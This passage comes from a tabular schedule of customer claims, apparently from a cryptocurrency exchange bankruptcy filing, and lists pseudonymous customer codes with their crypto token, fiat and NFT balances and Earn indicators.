| 07317643 | | BAT[1.01121618], BRZ[23.50707163], CUSDT[316.24380315], DOGE[145.12890009], ETH[.00006469], ETHW[9.16288406], GRT[.05311616], SHIB[26], SOL[.00028252], TRX[124.55031454], USD[0.06] | Yes | |
| 07317644 | | ALGO[2208.50335733], BTC[.02211757], CUSDT[2], DOGE[1.00235986], GRT[1894.66293173], LINK[1054.95872303], TRX[1], USD[65.34], USDT[0.00850248], YFI[.00000001] | Yes | |
| 07317648 | | ETH[.00551971], ETHW[.00545131], USD[0.00] | Yes | |
| 07317650 | | USD[0.00] | | |
| 07317653 | | USD[10.00] | | |
| 07317654 | | USD[10.68] | Yes | |
| 07317655 | | USD[10.00] | | |
| 07317659 | | CUSDT[1], DOGE[241.53990773], TRX[1], USD[0.00] | | |
| 07317660 | | CUSDT[8], DOGE[.00096682], SHIB[1], TRX[4], USD[0.01] | | |
| 07317661 | | BTC[.00000658], CUSDT[7], DOGE[.5130059], GRT[.00756383], SHIB[3533030.94142533], TRX[2], USD[0.05] | | |
| 07317662 | | DOGE[.71], USD[0.01] | | |
| 07317663 | | BRZ[1], CUSDT[2], DOGE[1174.62950617], SOL[9.50818769], TRX[2092.89091039], USD[0.00] | | |
| 07317664 | | BRZ[3], CUSDT[10], DOGE[1.0040532], LINK[.00000603], SOL[.00000768], TRX[1], UNI[.00000546], USD[0.00], USDT[0.21970302] | | |
| 07317665 | | BTC[0], ETH[0], SOL[0.00], USDT[0] | | |
| 07317670 | | USD[0.00] | | |
| 07317671 | | CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07317672 | | TRX[190.79803367], USD[0.00] | Yes | |
| 07317675 | | BRZ[2], CUSDT[6], DOGE[0], LTC[.0218924], SHIB[41.30282122], TRX[1], USD[0.09], USDT[0] | Yes | |
| 07317677 | | BTC[0.00009578], CUSDT[2], DOGE[2575.86370666], ETH[0.01306548], ETHW[0.01306548], TRX[1], USD[0.01] | | |
| 07317679 | | USD[0.00] | | |
| 07317680 | | BTC[0.00089234], DOGE[0], ETH[0], ETHW[0], SOL[0], USD[0.00] | | |
| 07317681 | | USD[10.00] | | |
| 07317684 | | USD[10.00] | | |
| 07317685 | | USD[10.00] | | |
| 07317686 | | BRZ[1], BTC[.00072291], USD[487.07] | | |
| 07317688 | | USD[10.00] | | |
| 07317689 | | BTC[0.01349730], ETH[.07140248], ETHW[.07051504], GRT[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000016] | Yes | |
| 07317690 | | BTC[.02177129], DOGE[203.69155902], SOL[0.01018361], USD[0.16] | | |
| 07317691 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07317692 | | BRZ[2], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07317693 | | USD[0.00] | | |
| 07317695 | | TRX[0], USD[0.00] | | |
| 07317696 | | USD[10.00] | | |
| 07317697 | | CUSDT[6], TRX[1], USD[27.12] | Yes | |
| 07317699 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07317700 | | BRZ[1], CUSDT[2], DOGE[3], LTC[1.85388004], USD[0.00] | Yes | |
| 07317702 | | CUSDT[1], DOGE[180.61472945], USD[0.00] | | |
| 07317704 | | BRZ[1], CUSDT[3], DOGE[13852.72733588], SHIB[796992.481203], TRX[2], USD[0.66] | | |
| 07317709 | | USD[10.00] | | |
| 07317710 | | BTC[0], DOGE[660.04841431], ETH[0], SOL[2.30050572], TRX[1], USD[0.00] | Yes | |
| 07317711 | | USD[10.00] | | |
| 07317712 | | CUSDT[2.27966132], DOGE[1], TRX[2], USD[0.00] | | |
| 07317713 | | USD[10.00] | | |
| 07317714 | | CUSDT[1], DOGE[838.87377108], TRX[1], USD[0.00] | | |
| 07317715 | | BTC[0], DOGE[6.56526261], USD[40.00] | | |
| 07317716 | | CUSDT[2], USD[0.00], USDT[0] | Yes | |
| 07317718 | | CUSDT[13], DOGE[1.00003919], USD[0.00] | Yes | |
| 07317719 | | SUSHI[.66450531], USD[0.00] | | |
| 07317720 | | BRZ[1], CUSDT[2], DOGE[12531.39741622], ETH[.00000943], ETHW[.00000943], LTC[7.22729535], USD[-472.42] | | |
| 07317723 | | BTC[0.00001249], USDT[7.073] | | |
| 07317725 | | USD[10.00] | | |
| 07317729 | | DOGE[.992], USD[0.00] | | |
| 07317730 | | BRZ[2], CUSDT[4], DOGE[1], SUSHI[.00025567], TRX[1], USD[0.00], USDT[0] | | |
| 07317732 | | USD[10.00] | | |
| 07317736 | | DOGE[1], USD[0.01] | | |
| 07317739 | | USD[10.00] | | |
| 07317740 | | USD[10.00] | | |
| 07317741 | | BAT[0], BTC[0], DOGE[0], ETH[0], GBP[0.00], GRT[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07317742 | | BRZ[1], BTC[0], CUSDT[4], DOGE[0], ETH[0], SHIB[1], SOL[0], TRX[6], UNI[0], USD[0.00] | | |
| 07317743 | | ETH[.00561659], ETHW[.00561659], USD[0.00] | | |
| 07317744 | | BTC[0.03320496], SOL[0], USD[4.43], USDT[0.00000007] | | |
| 07317745 | | USD[10.00] | | |
| 07317747 | | BTC[.01343066], DOGE[6115.05233976], ETH[0.28189754], ETHW[0.28189754], USD[0.00] | | |
| 07317748 | | USD[10.00] | | |
| 07317749 | | BRZ[4], BTC[0.01361640], CUSDT[38], DOGE[5.01970093], ETH[.33126793], ETHW[.33110777], GRT[1.00498957], SHIB[1], SOL[31.52348218], SUSHI[100.61128801], TRX[20.77809773], USD[0.00], USDT[1.09745635] | Yes | |
| 07317750 | | BAT[1.00033787], BRZ[1], BTC[0], CUSDT[4], DOGE[1], GRT[4.00135182], KSHIB[0], MATIC[0], SOL[0], SUSHI[0], TRX[6], USD[0.01], USDT[1.00033787] | | |
| 07317751 | | USD[10.00] | | |
| 07317752 | | USD[0.13] | | |
| 07317753 | | SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | | |
| 07317754 | | USD[10.00] | | |
| 07317757 | | USD[0.01] | | |
| 07317758 | | USD[69.31], USDT[0] | | |
| 07317761 | | USD[10.94] | Yes | |
| 07317763 | | USD[10.00] | | |
| 07317765 | | CUSDT[3], DOGE[776.754009], USD[0.00] | | |
| 07317766 | | USD[10.00] | | |
| 07317767 | | USD[10.00] | | |
| 07317768 | | CUSDT[1], SOL[1.40782967], USD[0.00] | Yes | |
| 07317769 | | DOGE[0] | | |
| 07317770 | | USD[10.00] | | |
| 07317771 | | USD[10.00] | | |
| 07317772 | | USD[0.00] | | |
| 07317773 | | AUD[0.00], AVAX[0], BRZ[0], BTC[0], DOGE[3.67253301], ETH[0.00000001], ETHW[0], EUR[0.00], GRT[0], LINK[0], MATIC[0], MKR[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07317775 | | USD[10.00] | | |
| 07317777 | | DOGE[22.52690562], USD[0.00] | | |
| 07317778 | | USD[10.00] | | |
| 07317779 | | BTC[0], TRX[3], USD[0.00] | | |
| 07317781 | | ETH[0] | | |
| 07317782 | | USD[10.00] | | |
| 07317783 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07317784 | | CUSDT[1], SOL[.00089058], USD[0.00] | Yes | |
| 07317785 | | BTC[0], DOGE[0], LINK[0], USD[0.00] | | |
| 07317787 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07317788 | | USD[10.00] | | |
| 07317789 | | SOL[0], USD[0.00], USDT[0] | Yes | |
| 07317790 | | CUSDT[8], DOGE[1], LINK[0], TRX[1], USD[0.01] | Yes | |
| 07317791 | | BRZ[1], DOGE[0], USD[0.01] | | |
| 07317792 | | USD[10.00] | | |
| 07317793 | | USD[10.00] | | |
| 07317794 | | DOGE[.51], SUSHI[.494], USD[0.21] | | |
| 07317795 | | LINK[.00000233], USD[0.00] | | |
| 07317796 | | USD[10.00] | | |
| 07317799 | | DOGE[1.43286529], USD[0.00] | | |
| 07317800 | | LINK[.31961793], USD[0.00] | | |
| 07317801 | | BAT[1], BRZ[2], CUSDT[4], TRX[2], USD[0.01] | | |
| 07317802 | | BRZ[0], BTC[0], ETH[0], ETHW[0], NFT (31608141449044050/StarAtlas Anniversary)[1], NFT (34455542478599651/StarAtlas Anniversary)[1], NFT (35365837327774847/StarAtlas Anniversary)[1], NFT (38671500733469864/Degenerate Trash Can)[1], NFT (43335574946550062/Degenerate Trash Can)[1], NFT (43565455877374073/StarAtlas Anniversary)[1], NFT (44648926188749331/StarAtlas Anniversary)[1], NFT (44856020241757131/StarAtlas Anniversary)[1], NFT (48790965070561484/Baby Bubblegoose #1643)[1], NFT (50459077201868267/StarAtlas Anniversary)[1], NFT (52552667439780367/StarAtlas Anniversary)[1], SUSHI[1.00629041], USD[0.00], USDT[0.00001772] | Yes | |
| 07317803 | | CUSDT[1], USD[0.00] | | |
| 07317804 | | USD[10.00] | | |
| 07317805 | | DOGE[0], GRT[0], LINK[0], NFT (34956992644379050/Coachella x FTX Weekend 1 #4621)[1], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07317806 | | BRZ[1], CUSDT[5], DOGE[0], USD[0.01] | | |
| 07317807 | | BRZ[1], CUSDT[836.88167668], DOGE[23523.73844978], GRT[.00002687], TRX[1], USD[0.68] | Yes | |
| 07317809 | | CUSDT[7], DOGE[.8561046], TRX[4], USD[6.67] | | |
| 07317810 | | USD[0.04], USDT[0] | | |
| 07317816 | | DOGE[1], USD[0.00] | | |
| 07317817 | | BTC[0], SOL[.00000019], USD[0.00] | Yes | |
| 07317822 | | BTC[.00743827], DOGE[.047], USD[0.00] | | |
| 07317823 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07317824 | | CUSDT[1], DOGE[821.13423512], USD[0.00] | Yes | |
| 07317825 | | USD[10.00] | | |
| 07317826 | | USD[10.00] | | |
| 07317827 | | USD[10.00] | | |
| 07317828 | | BTC[0.00002269], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], SUSHI[0], USD[184.09] | | |
| 07317829 | | BCH[.21795245], CUSDT[2], DOGE[3714.8074007], ETH[.07340204], ETHW[.07340204], LTC[1.13245208], USD[10.00] | | |
| 07317830 | | USD[10.00] | | |
| 07317831 | | BRZ[1], CUSDT[1], DOGE[1], ETH[.30228223], ETHW[.30228223], USD[224.92], USDT[4.9735279] | | |
| 07317832 | | USD[0.00] | | |
| 07317833 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00], USDT[0] | | |
| 07317834 | | BTC[0.00007288], NFT (45491313356767385/Entrance Voucher #76)[1], SOL[.003], USD[3.34] | | |
| 07317835 | | USD[10.00] | | |
| 07317838 | | BRZ[2], BTC[0], DOGE[0], TRX[3], USD[0.00] | | |
| 07317839 | | LINK[.0996], USD[0.00] | | |
| 07317840 | | BRZ[5], CUSDT[10], DOGE[1], LTC[1.71881689], SHIB[5], SUSHI[.00072837], TRX[5], USD[0.00], USDT[0] | Yes | |
| 07317844 | | DOGE[1], SOL[0.44631323], USD[0.00] | | |
| 07317845 | | USD[10.00] | | |
| 07317846 | | BF_POINT[100], DOGE[3704.20869725], GRT[330.61640395], SHIB[44362834.07139204], USD[-140.00], USDT[1.10619024] | Yes | |
| 07317847 | | BAT[1], CUSDT[1], DOGE[11029.0798526], TRX[2409.78154058], USD[0.00] | | |
| 07317848 | | USD[10.00] | | |
| 07317851 | | BTC[0], DOGE[0], ETH[0], USD[0.90] | | |
| 07317852 | | USD[10.00] | | |
| 07317853 | | ETH[.85492875], ETHW[.05095155], USD[1.45] | | |
| 07317854 | | BF_POINT[200], CUSDT[6], ETH[0], USD[0.00] | Yes | |
| 07317856 | | DOGE[4.000548], TRX[2], USD[0.00] | Yes | |
| 07317857 | | USD[0.01] | | |
| 07317858 | | USD[11.11] | Yes | |
| 07317862 | | DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07317865 | | UNI[12.43755], USD[0.00], USDT[.34269082] | | |
| 07317867 | | USD[10.00] | | |
| 07317868 | | USD[0.25] | | |
| 07317869 | | USD[11.07] | Yes | |
| 07317870 | | CUSDT[2], DOGE[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07317871 | | CUSDT[1], DOGE[160.22912829], USD[0.00] | Yes | |
| 07317872 | | BRZ[1], CUSDT[3], DOGE[24.73330922], USD[0.00] | | |
| 07317875 | | USD[10.00] | | |
| 07317876 | | USD[10.00] | | |
| 07317877 | | DOGE[1337.94224926], USD[0.84] | | |
| 07317878 | | CUSDT[4], GRT[4.49928339], USD[0.69], USDT[0] | | |
| 07317880 | | AAVE[0], BAT[5.27918305], BRZ[7.36333318], BTC[0], CUSDT[6], DAI[0], DOGE[8.07760326], ETH[0], ETHW[0], GRT[1], LINK[0], LTC[0], MATIC[0], MKR[0], PAXG[0], SHIB[10], SOL[0], SUSHI[0], TRX[12.00800266], USD[0.01], USDT[1.05149627] | Yes | |
| 07317881 | | BTC[.0000972], DOGE[.264], USD[1.93] | | |
| 07317884 | | CUSDT[1], DOGE[6.18475866], ETH[.000018], ETHW[.000018], SHIB[1], TRX[1], USD[0.00], USDT[2.19914433] | Yes | |
| 07317886 | | USD[10.00] | | |
| 07317887 | | BTC[0.00011847], DOGE[0], ETH[.039416], ETHW[.039416], SUSHI[32.50509199], USD[0.10] | | |
| 07317888 | | DOGE[.39358942], TRX[1], USD[0.00] | | |
| 07317891 | | USD[0.00] | | |
| 07317892 | | BAT[1], BTC[.00829112], DOGE[.1324087], TRX[1], USD[0.48] | | |
| 07317895 | | BAT[0], BTC[0], DOGE[3], USD[32.02], USDT[0] | | |
| 07317896 | | BF_POINT[300], BRZ[3], BTC[0], ETH[.00000001], MATIC[1.00677693], SOL[0], TRX[39295.92155208], USD[5593.14], USDT[0], YFI[.00000001] | Yes | |
| 07317897 | | USD[10.00] | | |
| 07317899 | | USD[10.00] | | |
| 07317900 | | CUSDT[1], DOGE[2.89183827], SOL[.03544078], TRX[6], USD[0.09] | | |
| 07317901 | | BRZ[1], CUSDT[13], DOGE[.0000225], ETH[.00000075], ETHW[.00000075], KSHIB[.75320899], MATIC[.0001376], SHIB[4], TRX[5], USD[0.01] | | |
| 07317902 | | SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07317905 | | USD[0.01] | Yes | |
| 07317907 | | CUSDT[1], USD[0.00] | | |
| 07317909 | | SOL[1.27168942], USD[0.00] | | |
| 07317911 | | USD[10.00] | | |
| 07317912 | | BTC[0], DOGE[0], ETH[0], GRT[0], KSHIB[0], LINK[0], SHIB[0], TRX[0], USD[0.00] | | |
| 07317913 | | USD[10.00] | | |
| 07317915 | | CUSDT[1], DOGE[1016.91582987], USD[330.00] | | |
| 07317917 | | USD[10.00] | | |
| 07317918 | | USD[0.00] | | |
| 07317922 | | DOGE[.3130851], GRT[.822], LTC[1.998], SUSHI[.346], UNI[.0794], USD[0.00] | | |
| 07317923 | | BTC[0], USD[0.01] | | |
| 07317925 | | USD[10.00] | | |
| 07317928 | | USD[0.00] | | |
| 07317932 | | USD[0.00] | | |
| 07317934 | | USD[10.00] | | |
| 07317935 | | BTC[.00005] | | |
| 07317936 | | BTC[.0001975], USD[0.00] | | |
| 07317937 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07317938 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07317940 | | BAT[1.00780188], BCH[.00000019], BRZ[1], BTC[0], CUSDT[12], DOGE[5], ETH[0], MATIC[0], NFT (34558442491228003B/Planet #27)[1], NFT (36428541174946587S/AI-generated landscape #76)[1], NFT (46865307016917183G/Peaceful time)[1], NFT (51596289181064472J/AI-generated landscape #89)[1], SOL[0.00002801], TRX[5], USD[0.00], USDT[0] | Yes | |
| 07317941 | | USD[10.00] | | |
| 07317942 | | DOGE[0] | | |
| 07317945 | | BTC[.0573426], ETHW[9.49], USD[662.24], USDT[902.884177] | | |
| 07317946 | | USD[10.00] | | |
| 07317947 | | USD[10.00] | | |
| 07317948 | | DOGE[28.97666978], USD[0.00] | | |
| 07317949 | | DOGE[0], ETH[0], LTC[0] | | |
| 07317950 | | SOL[6.9181] | | |
| 07317953 | | DOGE[30.35619501], ETH[0.02301095], ETHW[0.02301095], GRT[53.46245754], SHIB[791125.26002528], USD[0.00] | | |
| 07317955 | | BTC[0], SOL[0], USD[0.00] | | |
| 07317957 | | BAT[1], CUSDT[4], DOGE[1], GRT[1], USD[0.00], USDT[1] | | |
| 07317959 | | CUSDT[2], DOGE[970.79508125], TRX[1], USD[0.00] | | |
| 07317961 | | BAT[5.27556003], BF_POINT[500], CUSDT[82.71663848], ETH[0.00000168], ETHW[0.00000168], GRT[8.35846751], SHIB[12], SOL[0], TRX[43.74785299], USD[0.01], USDT[0] | Yes | |
| 07317962 | | USD[10.00] | | |
| 07317963 | | USD[10.00] | | |
| 07317965 | | USD[10.00] | | |
| 07317967 | | CUSDT[1], DOGE[177.45310088], USD[0.50] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07317968 | | USD[10.00] | | |
| 07317969 | | USD[10.00] | | |
| 07317970 | | DOGE[.192], ETH[.00000001], USD[1.29] | | |
| 07317971 | | BAT[1], CUSDT[1], DOGE[3667.63973477], SUSHI[.01228155], TRX[4], USD[0.61], USDT[1] | | |
| 07317972 | | DOGE[.565], USD[0.00] | | |
| 07317976 | | BAT[1], CUSDT[1], GRT[1], TRX[5], USD[10.00] | | |
| 07317977 | | BTC[0.00090735], USD[0.00] | | |
| 07317978 | | TRX[1], USD[39.27] | | |
| 07317980 | | USD[10.00] | | |
| 07317981 | | USD[10.00] | | |
| 07317982 | | DOGE[0.22800000], LTC[0], SUSHI[.348], USD[1.56] | | |
| 07317984 | | USD[0.00] | | |
| 07317986 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07317987 | | USD[10.00] | | |
| 07317988 | | USD[2.21] | | |
| 07317989 | | CUSDT[2], DOGE[113.29300857], TRX[1], USD[0.01] | | |
| 07317990 | | USD[10.00] | | |
| 07317991 | | USD[510.00] | | |
| 07317996 | | CUSDT[2], DOGE[2265.50286305], TRX[1], USD[0.00] | | |
| 07317998 | | DOGE[466.52], USD[329.09] | | |
| 07317999 | | USD[10.00] | | |
| 07318000 | | BTC[0], USD[0.01] | | |
| 07318001 | | USD[10.00] | | |
| 07318002 | | CUSDT[112.18445629], TRX[36.75851027], USD[0.00] | Yes | |
| 07318004 | | USD[10.00] | | |
| 07318005 | | USD[10.00] | | |
| 07318006 | | BAT[2.07196744], BRZ[5.07952967], CUSDT[5], DOGE[2], ETH[.29635229], ETHW[.29615732], GRT[4.14461604], SUSHI[.00106571], TRX[7], USD[0.00], USDT[1.0788735] | Yes | |
| 07318008 | | USD[0.00] | | |
| 07318009 | | DOGE[66.86455901], GRT[3.82764579], USD[0.00] | | |
| 07318010 | | USD[0.01] | | |
| 07318011 | | TRX[1], USD[0.01] | | |
| 07318013 | | DOGE[0.45100000], ETH[0], LTC[0], TRX[0], USD[0.10] | | |
| 07318014 | | USD[10.00] | | |
| 07318016 | | BTC[0], ETH[0], LINK[.0845], NFT [331198357332642806/Fancy Frenchies #8757][1], NFT [340869610813502134/Fancy Frenchies #7468][1], NFT [347962061057224581/Fancy Frenchies #5399][1], NFT [389348693040363018/Fancy Frenchies #5417][1], NFT [394340095512376712/Fancy Frenchies #5601][1], NFT [401953885741766472/Fancy Frenchies #4427][1], NFT [430318728415507257/Fancy Frenchies #2354][1], NFT [442241073915073657/Fancy Frenchies #1777][1], NFT [447623583280070869/Fancy Frenchies #9634][1], NFT [510477105924937954/ALPHA-RONIN #1066][1], NFT [514450555179180160/Fancy Frenchies #9392][1], NFT [531623517383500176/Fancy Frenchies #2492][1], NFT [560447679662659234/Fancy Frenchies #2715][1], NFT [568640095754556182/Fancy Frenchies #2786][1], SOL[0], UNI[0], USD[0.07], USDT[0] | | |
| 07318017 | | DOGE[0], USD[0.00] | | |
| 07318018 | | USD[10.00] | | |
| 07318020 | | DOGE[0], USD[0.00] | | |
| 07318023 | | BTC[0], DOGE[6649.14920949], NFT [304725516063311325/Bloombell][1], NFT [312187926340761388/Kitty Key][1], NFT [341551897917877229/PepperMint][1], NFT [342645532665531287/Aurorian #680][1], NFT [346203962131183708/Crystal Egg][1], NFT [422011680004036715/Crystal Egg][1], NFT [422288572133628337/MagicEden Vaults][1], NFT [460017773279862181/Munch moon][1], NFT [469403326484808460/MagicEden Vaults][1], NFT [477975319848652971/DinoBitten][1], NFT [510128040745151284/MagicEden Vaults][1], NFT [518345439141627165/MagicEden Vaults][1], NFT [575540059945244709/MagicEden Vaults][1], SOL[0], USD[1055.05], USDT[0.00000015] | | |
| 07318024 | | DOGE[0], USD[0.00] | | |
| 07318025 | | DOGE[.828], USD[0.80] | | |
| 07318026 | | BTC[0], DOGE[0], USD[0.62] | | |
| 07318028 | | USD[10.00] | | |
| 07318030 | | USD[10.00] | | |
| 07318031 | | BAT[1], TRX[3], USD[0.01] | | |
| 07318032 | | BRZ[2], ETH[.00002098], LINK[1.01308021], SHIB[4], SOL[.00000001], TRX[3], USD[0.00] | Yes | |
| 07318034 | | USD[10.00] | | |
| 07318035 | | USD[60.00] | | |
| 07318036 | | BTC[0], DOGE[0], USD[0.37] | | |
| 07318037 | | BTC[0], LINK[0], NFT [527701033523320780/Australia Ticket Stub #557][1], USD[0.43], USDT[0] | | |
| 07318038 | | BTC[.00007054], USD[0.00] | | |
| 07318039 | | USD[10.98] | Yes | |
| 07318040 | | USD[10.00] | | |
| 07318042 | | BTC[.002994], DOGE[281.17358207], USD[4.23] | | |
| 07318043 | | CUSDT[1], DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07318044 | | TRX[1], USD[0.00], USDT[1] | | |
| 07318047 | | DOGE[1469.69962075], USD[0.00] | | |
| 07318048 | | USD[10.00] | | |
| 07318049 | | CUSDT[1], DOGE[931.15349059], USD[310.00] | | |
| 07318051 | | USD[10.00] | | |
| 07318054 | | DOGE[918.60006474], USD[0.00] | | |
| 07318055 | | BRZ[0], DOGE[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.01], USDT[0.00000001] | | |
| 07318056 | | USD[0.46] | | |
| 07318061 | | USD[10.00] | | |
| 07318062 | | USD[10.00] | | |
| 07318063 | | USD[0.00] | Yes | |
| 07318064 | | USD[10.00] | | |
| 07318065 | | CUSDT[2], DOGE[742.26270484], TRX[2], USD[50.14] | | |
| 07318066 | | DOGE[69.64863646], USD[0.00] | | |
| 07318067 | | BTC[0.00003541], DOGE[0], USD[0.00] | | |
| 07318069 | | CUSDT[1], DOGE[4], ETH[.00000001], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000004] | | |
| 07318071 | | BTC[.00020786], DOGE[1], USD[0.00] | | |
| 07318072 | | USD[10.00] | | |
| 07318073 | | BRZ[1], SHIB[1], SOL[1.54270084], TRX[3], USD[0.00], USDT[0] | | |
| 07318074 | | CUSDT[2], TRX[195.30212457], USD[0.00] | | |
| 07318075 | | USD[10.00] | | |
| 07318076 | | CUSDT[4], DOGE[2065.7009995], GRT[1.00498957], TRX[4], UNI[.00003831], USD[0.00] | Yes | |
| 07318078 | | USD[10.00] | | |
| 07318079 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07318081 | | USD[10.00] | | |
| 07318083 | | USD[10.00] | | |
| 07318086 | | USD[0.05] | | |
| 07318087 | | DOGE[1], USD[0.00] | | |
| 07318088 | | USD[0.01] | | |
| 07318091 | | USD[0.01] | | |
| 07318092 | | USD[20.00] | | |
| 07318096 | | BRZ[4], CUSDT[5], DOGE[0], ETH[0.06472051], ETHW[0.06391584], LTC[.41069365], TRX[1], USD[0.00] | Yes | |
| 07318098 | | USD[10.00] | | |
| 07318100 | | USD[10.00] | | |
| 07318103 | | DOGE[0], USD[51.32], USDT[0] | | |
| 07318106 | | CUSDT[1], DOGE[11174.52559742], SHIB[1569634.70319634], USD[0.00] | | |
| 07318108 | | USD[10.00] | | |
| 07318109 | | BTC[.0001], USD[40.00] | | |
| 07318110 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07318111 | | CUSDT[1], DOGE[0], LTC[0], SUSHI[0], TRX[0], USD[10.00] | | |
| 07318112 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07318114 | | USD[10.00] | | |
| 07318117 | | CUSDT[11], USD[0.00] | | |
| 07318119 | | BTC[0], DOGE[0], SHIB[3132605.36042613], USD[0.00] | | |
| 07318120 | | DOGE[0], ETH[0], MATIC[69.57], USD[281.37] | | |
| 07318121 | | DOGE[1], TRX[2], USD[0.00] | | |
| 07318122 | | USD[10.00] | | |
| 07318125 | | CUSDT[1], DOGE[.00036181], USD[11.52] | Yes | |
| 07318126 | | DOGE[526.035], USD[0.02] | | |
| 07318127 | | USD[10.00] | | |
| 07318129 | | BTC[.00005386], CUSDT[3], DOGE[88.53137639], ETH[.04116601], ETHW[.04116601], USD[0.50] | | |
| 07318130 | | USD[10.00] | | |
| 07318131 | | SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07318132 | | BRZ[0], BTC[0], CUSDT[3], DOGE[1], TRX[0], USD[10.00] | | |
| 07318133 | | USD[10.00] | | |
| 07318136 | | DOGE[0], SUSHI[0], USD[0.06] | | |
| 07318137 | | ETH[0], SOL[.00000001], USD[0.00] | | |
| 07318138 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07318139 | | USD[10.00] | | |
| 07318142 | | USD[10.00] | | |
| 07318143 | | USD[0.00], USDT[0] | | |
| 07318145 | | BRZ[1], BTC[0], CUSDT[3], DOGE[1], TRX[0], USD[0.00] | | |
| 07318147 | | DOGE[0], ETH[0.00548644], ETHW[0.00548644] | | |
| 07318149 | | BAT[1], BRZ[1], BTC[0.00082647], CUSDT[1], DOGE[0.00002770], GRT[1], TRX[1], USD[0.10] | | |
| 07318150 | | USD[0.00] | | |
| 07318154 | | DOGE[1], USD[0.00] | | |
| 07318155 | | USD[10.00] | | |
| 07318156 | | USD[10.00] | | |
| 07318160 | | BTC[0], USD[0.00] | | |
| 07318161 | | USD[10.00] | | |
| 07318162 | | DOGE[156.93529553], LTC[.07822791], TRX[361.88227839], USD[31.64] | Yes | |
| 07318164 | | BRZ[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07318165 | | BTC[.00183022], CUSDT[4], ETH[.05037928], ETHW[.05037928], LTC[.15141782], MATIC[77.62838872], SOL[.21300182], USD[0.00] | | |
| 07318167 | | USD[10.00] | | |
| 07318168 | | DOGE[1.00117355], USD[26.10] | Yes | |
| 07318170 | | USD[0.01] | | |
| 07318172 | | BRZ[8.81009035], CUSDT[17], DOGE[0], ETH[0], GRT[1.00404471], TRX[1], USD[0.01], USDT[1.06665696] | Yes | |
| 07318178 | Contingent, Disputed | BTC[0], DOGE[0], ETH[0.00000801], ETHW[0.00000801], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07318179 | | ETH[.01626829], ETHW[.02684733], MATIC[80.13225483], USD[0.00] | Yes | |
| 07318180 | | AAVE[0], BTC[0], DOGE[0], SOL[0], USD[0.72], USDT[0.00023031] | | |
| 07318181 | | BCH[.15050403], BTC[.0538067], DOGE[1530.65911416], ETH[.0588958], ETHW[.0588958], SHIB[1561891.24442796], SOL[6.01463085], USD[0.00] | | |
| 07318183 | | USD[10.00] | | |
| 07318186 | | USD[10.00] | | |
| 07318187 | | DOGE[.008], ETH[.00016609], ETHW[0.00016608], SOL[4.2828], USD[0.78], USDT[0] | | |
| 07318188 | | SOL[.68752866], USD[0.00] | | |
| 07318189 | | USD[0.01] | | |
| 07318191 | | DOGE[1], ETH[.00000635], LINK[.0004953], SOL[.00001846], TRX[2], USD[1048.37], USDT[0] | Yes | |
| 07318192 | | BTC[0], USD[0.00], USDT[.00000064] | | |
| 07318193 | | DOGE[3670.252], USD[0.05] | | |
| 07318194 | | USD[10.00] | | |
| 07318196 | | BRZ[0], DOGE[0], TRX[3], USD[0.00] | Yes | |
| 07318198 | | BRZ[1], CUSDT[2], DOGE[9.63869544], GRT[.00047679], LINK[1.87945846], SHIB[2], SUSHI[.00595198], TRX[3], UNI[.00040075], USD[0.00] | Yes | |
| 07318199 | | USD[10.00] | | |
| 07318201 | | USD[10.00] | | |
| 07318203 | | DOGE[620.10991654], USD[0.00] | | |
| 07318204 | | BTC[0], ETH[0], USD[4.16] | | |
| 07318208 | | CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07318209 | | ETH[.00564546], ETHW[.00564546], USD[0.00] | | |
| 07318211 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07318212 | | DOGE[0], USDT[0.00000122] | | |
| 07318215 | | CUSDT[1], DOGE[68.70189406], USD[0.16] | | |
| 07318217 | | USD[0.01] | | |
| 07318218 | | USD[10.00] | | |
| 07318219 | | USD[10.00] | | |
| 07318220 | | USD[1.06], USDT[0] | | |
